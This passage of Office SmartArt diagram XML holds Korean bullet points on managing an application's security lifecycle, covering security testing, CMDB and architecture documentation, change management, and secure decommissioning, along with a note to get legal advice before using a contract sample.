          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B6FED2A-CCAD-4150-BE86-460500775F70}" type="sibTrans" cxnId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9654840-CCA9-475F-8026-A0CB36AC23A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응용프로그램에서 내부 프로세스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보호 요구 사항 및 추측된 위협 수준에 따라 보안 테스트를 관리합니다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3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" type="parTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}" type="sibTrans" cxnId="{2AE97330-074B-4EBD-B20E-409131B4C40C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A7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</a:rPr>
            <a:t>애플리케이션을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작동시키고 필요한 경우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이전에 사용한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션에서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참고합니다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899E3CF7-9D0C-4165-A610-81A1077E783C}" type="parTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}" type="sibTrans" cxnId="{48311AAE-790D-405B-BEB3-7AB59042F49A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A13AC1-43D9-4BE9-9345-EBD28ED6472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변경 관리 데이터베이스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(CMDB)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및 보안 아키텍처를 포함한 모든 문서를 완성합니다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E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" type="parTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{585354FF-8734-42ED-AE1D-8349C73E2B59}" type="sibTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C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사용자의 보안 인식을 높이고 보안과 가용성 간의 충돌을 관리합니다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36639052-9A6E-47C7-A020-F81AA12F1A3C}" type="parTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1887D76E-BF0A-4F02-9071-53896CF7538A}" type="sibTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60779E52-CC5F-4109-9E02-C8F73324C37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변경 사항을 계획하고 관리합니다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dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션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또는 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OS, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>미들웨어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및 라이브러리와 같은 다른 구성 요소의 새 버전으로 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>마이그레이션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C494CE06-D836-41D9-ADFD-898F15E5786C}" type="parTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}" type="sibTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8034F6-E027-4D76-A5F9-70FE299619D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CMDB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및 보안 아키텍처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제어 및 대응책을 포함한 모든 실행 책자 또는 프로젝트 문서를 업데이트 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F121DD58-051E-4186-B611-30AF12D23895}" type="parTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}" type="sibTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CD4BB62-D241-46BC-9B32-86E2CC12748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미사용 계정 및 권한을 포함한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션은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안전하게 폐기합니다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D2D2A06B-5339-4194-90B5-CCE406438AF1}" type="parTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}" type="sibTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0103A81-76F6-40DD-8B7E-FAE3E5F8802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en-AU" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB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상에서 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션의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 상태를 폐기로 설정합니다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A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" type="parTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B4B5BC-D671-4D10-91B2-18BB09341248}" type="sibTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="54000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" indent="-57150">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
          </a:pP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기술적 기능 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>아키텍처와 통합을 테스트하고 비즈니스 면의 테스트를 조정합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="9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de-DE" sz="90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4707E43C-0E63-42FE-96E7-6097CEC31A66}" type="parTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}" type="sibTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{993D5C52-4D9A-4060-970B-018D8E24E26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참고 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부록은 미국 계약법을 위한 것으로 부록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 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>샘플을 사용하기 전에 자격이 검증된 법률 자문을 구하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="9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noProof="0" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1436970-E7CE-4722-907E-455290A4793A}" type="parTrans" cxnId="{158F112C-F949-432D-851F-5FEB53856F67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D062572-A863-4D4F-8FBA-A2E747171545}" type="sibTrans" cxnId="{158F112C-F949-432D-851F-5FEB53856F67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US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6" custScaleX="45202" custScaleY="8262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6" custScaleX="123722" custScaleY="90910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6" custScaleX="45202" custScaleY="9850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6" custScaleX="123722" custScaleY="110001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6" custScaleX="45202" custScaleY="9861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6" custScaleX="123722" custScaleY="102028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6FA43676-E617-4D34-8266-D87F1E87C4E7}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custScaleX="45202" custScaleY="12096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92D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="144855">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" type="pres">
      <dgm:prSet presAssocID="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custScaleX="45202" custScaleY="101258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0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="107152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{78713489-5D47-416E-ADAE-302406F812AE}" type="pres">
      <dgm:prSet presAssocID="{3AEE799B-7F35-4AE2-93E2-335733E35922}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="45202" custScaleY="6209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80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="6209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FC5E301-BDE4-4D4C-B6FC-1C26EB94D275}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" srcOrd="2" destOrd="0" parTransId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" sibTransId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}"/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9FCAC402-6721-43DD-BDB5-30970CCF9503}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{13DC6005-2EEE-4CC6-950D-1BA0F72320B6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E75AFF05-24A4-4F24-9BDF-FD814EC18194}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5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52774408-00C0-4322-998F-1BF1674B07BA}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C02AA0B-C48F-4A5F-8EE5-36E3FDA38968}" type="presOf" srcId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6631110F-6FC8-4134-8135-162E009E16B1}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{630BF613-79F8-428F-8964-E241E474DFB8}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" srcOrd="0" destOrd="0" parTransId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" sibTransId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}"/>
    <dgm:cxn modelId="{9E460D15-AA65-4772-BCA8-D9675968EEB0}" type="presOf" srcId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{49821016-59B2-49A9-8B65-5A27F6D118C2}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="2" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{D080191A-6C0F-4EF1-9693-E0DF2CF8936B}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" srcOrd="1" destOrd="0" parTransId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" sibTransId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}"/>
    <dgm:cxn modelId="{B98CA423-6056-48A5-8715-E2F822D9E61B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="3" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{62404027-5448-4393-9E79-DA90FB84286A}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" srcOrd="3" destOrd="0" parTransId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" sibTransId="{03388AB2-B7BD-4A7D-8228-58066747E14F}"/>
    <dgm:cxn modelId="{490E4F28-A39E-4DEB-9CBA-83BD2E25206C}" type="presOf" srcId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A1A7A928-5DD1-47DB-931D-B9CD8EF0E8D2}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21C3D728-8DCF-48EF-BACA-C1919DEBAD4D}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5D5E329-C7C3-40CD-9EAB-93C1FF979C2A}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{158F112C-F949-432D-851F-5FEB53856F67}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{993D5C52-4D9A-4060-970B-018D8E24E267}" srcOrd="4" destOrd="0" parTransId="{A1436970-E7CE-4722-907E-455290A4793A}" sibTransId="{7D062572-A863-4D4F-8FBA-A2E747171545}"/>
    <dgm:cxn modelId="{2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="3" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{0F0F953A-05DF-4474-AE36-5F623D52A7E2}" type="presOf" srcId="{993D5C52-4D9A-4060-970B-018D8E24E267}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" srcOrd="5" destOrd="0" parTransId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" sibTransId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{5A427861-B8AE-49B0-88A1-1B7FCD0E0251}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D50A161-8479-49DD-8EA1-29650ECA12CA}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" srcOrd="0" destOrd="0" parTransId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" sibTransId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}"/>
    <dgm:cxn modelId="{9EECA36E-CE50-4BEC-B169-81FE8B3DBE6B}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CA7C9253-9FEA-4AD5-BB0B-4DEB47F0C280}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE369573-7275-4190-A508-8493472AD3CB}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="1" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="5" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{6C048991-4CC6-48F3-85DE-06094639B4B0}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="1" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{97452B92-22D7-4E80-B74D-5D72DE542765}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="2" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{5EFC0A93-9C32-4E84-B0D6-6D31D27269A3}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5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176CCB9F-2462-48F7-817F-5F241A01607F}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{953325A0-207E-4AE6-A6DC-14B69025B19F}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
